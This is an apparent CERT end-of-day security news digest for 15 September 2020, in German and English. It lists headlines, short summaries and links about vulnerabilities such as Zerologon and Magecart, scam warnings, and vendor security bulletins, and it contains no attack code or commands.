Tageszusammenfassung - 15.09.2020

End-of-Day report

Timeframe: Montag 14-09-2020 18:00 - Dienstag 15-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter

News

Windows 10 'Finger' command can be abused to download or steal files

The list of native executables in Windows that can download or run malicious code keeps growing as another one has been reported recently.

https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/


Sicherheitslücke: Mit acht Nullen zum Active-Directory-Admin

Die Sicherheitslücke Zerologon nutzt einen Fehler in Netlogon aus und involviert die Zahl Null auf kreative Weise - um Passwörter zu ändern.

https://www.golem.de/news/sicherheitsluecke-mit-acht-nullen-zum-active-directory-admin-2009-150869-rss.html


Erfolgreiche Angriffskampagne trifft Online-Shops auf Basis von Magento 1

Der Support für Version 1.x der Onlineshop-Software Magento endete im Juni 2020. Eine aktuelle "Magecart"-Angriffskampagne zielt nun auf veraltete Shops.

https://heise.de/-4894269


Shitrix-Nachwehen: Citrix-Systeme mit unbemerkten Backdoors

Auf Citrix ADC und Netscaler Gateways sind offenbar über die Shitrix-Lücke Anfang des Jahres Backdoors installiert worden, durch die Ransomware gelangen kann.

https://heise.de/-4901590


Erpressungs-E-Mails: Kriminelle hätten Beweise, dass Sie fremdgehen

Werden Sie per E-Mail erpresst? Behauptet der Erpresser, einen Virus auf Ihrem Smartphone installiert zu haben, der Ihre Aktivitäten überwacht? Hat er angeblich Beweismaterial, dass Sie beim Fremdgehen zeigt? Fordert man für Stillschweigen die Überweisung von Bitcoins? Dann: Machen Sie sich keine Sorgen! Es handelt sich um ein betrügerisches E-Mail, das aktuell massenhaft versendet wird!

https://www.watchlist-internet.at/news/erpressungs-e-mails-kriminelle-haetten-beweise-dass-sie-fremdgehen/


Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits

We captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends.

https://unit42.paloaltonetworks.com/network-attack-trends/


MITRE releases emulation plan for FIN6 hacking group, more to follow

New MITRE project to provide free emulation plans that mimic major threat actors in order to train and help defenders.

https://www.zdnet.com/article/mitre-releases-emulation-plan-for-fin6-hacking-group-more-to-follow/


Hackers are getting more hands-on with their attacks. Thats not a good sign

Both nation-state backed hackers and cyber criminals asking trying to take advantage of the rise in remote working, and getting more sophisticated in their approach.

https://www.zdnet.com/article/hackers-are-getting-more-hands-on-with-their-attacks-thats-not-a-good-sign/

Vulnerabilities

MFA Bypass Bugs Opened Microsoft 365 to Attack

Vulnerabilities 'that have existed for years' in WS-Trust could be exploited to attack other services such as Azure and Visual Studio.

https://threatpost.com/flaws-in-microsoft-365s-mfa-access-cloud-apps/159240/


VMware VMSA-2020-0020 (Sep 14)

VMware Workstation, Fusion and Horizon Client updates address multiple security vulnerabilities (CVE-2020-3980, CVE-2020-3986, CVE-2020-3987, CVE-2020-3988, CVE-2020-3989, CVE-2020-3990)

https://www.vmware.com/security/advisories/VMSA-2020-0020.html


Notfallpatch für Adobe Media Encoder verfügbar

Angreifer könnten Media Encoder von Adobe attackieren und Informationen leaken.

https://heise.de/-4901833


Vulnerability Spotlight: Memory corruption in Google PDFium

Google Chromes PDFium feature could be exploited by an adversary to corrupt memory and potentially execute remote code. Chrome is a popular, free web browser available on all operating systems. PDFium allows users to open PDFs inside Chrome. We recently discovered a bug that would allow an adversary to send a malicious web page to a user, and then cause out-of-bounds memory access.

https://blog.talosintelligence.com/2020/09/vuln-spotlight-google-pdfium-sept-2020.html


Security updates for Tuesday

Security updates have been issued by CentOS (dovecot), Debian (gnome-shell and teeworlds), Mageia (libetpan and zeromq), openSUSE (libxml2), Red Hat (chromium-browser and librepo), SUSE (compat-openssl098, firefox, kernel, openssl, and shim), and Ubuntu (gupnp).

https://lwn.net/Articles/831592/


Synology-SA-20:20 Photo Station

Multiple vulnerabilities allow remote attackers to execute arbitrary code via a susceptible version of Photo Station.

https://www.synology.com/en-global/support/security/Synology_SA_20_20


Security Bulletin: IBM Maximo Asset Management is vulnerable to Java Deserialization (CVE-2020-4521)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-java-deserialization-cve-2020-4521/


Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-a-missing-security-control-vulnerability-2/


Security Bulletin: IBM Maximo Asset Management is vulnerable to SQL Injection (CVE-2019-4671)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-sql-injection-cve-2019-4671/


Security Bulletin: Docker vulnerability affects IBM Spectrum Protect Plus (CVE-2020-13401)

https://www.ibm.com/blogs/psirt/security-bulletin-docker-vulnerability-affects-ibm-spectrum-protect-plus-cve-2020-13401/


Security Bulletin: Linux Kernel vulnerability affects IBM Spectrum Protect Plus (187206)

https://www.ibm.com/blogs/psirt/security-bulletin-linux-kernel-vulnerability-affects-ibm-spectrum-protect-plus-187206/


Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site request forgery (CVE-2020-4526)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-management-is-vulnerable-to-cross-site-request-forgery-cve-2020-4526/


Security Bulletin: Directory Traversal and Execution of Arbitrary Code vulnerabilities in IBM Spectrum Protect Plus (CVE-2020-4711, CVE-2020-4703)

https://www.ibm.com/blogs/psirt/security-bulletin-directory-traversal-and-execution-of-arbitrary-code-vulnerabilities-in-ibm-spectrum-protect-plus-cve-2020-4711-cve-2020-4703/


Security Bulletin: Cacheable HTTPS Response vulnerability in IBM Tivoli Business Service Manager (CVE-2020-4344)

https://www.ibm.com/blogs/psirt/security-bulletin-cacheable-https-response-vulnerability-in-ibm-tivoli-business-service-manager-cve-2020-4344/


Security Bulletin: A vulnerability in IBM Java SDK affects IBM Tivoli Business Service Manager (CVE-2020-14577)

https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-java-sdk-affects-ibm-tivoli-business-service-manager-cve-2020-14577/


Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier

https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vulnerability-affecting-aspera-connect-3-9-9-and-earlier-3/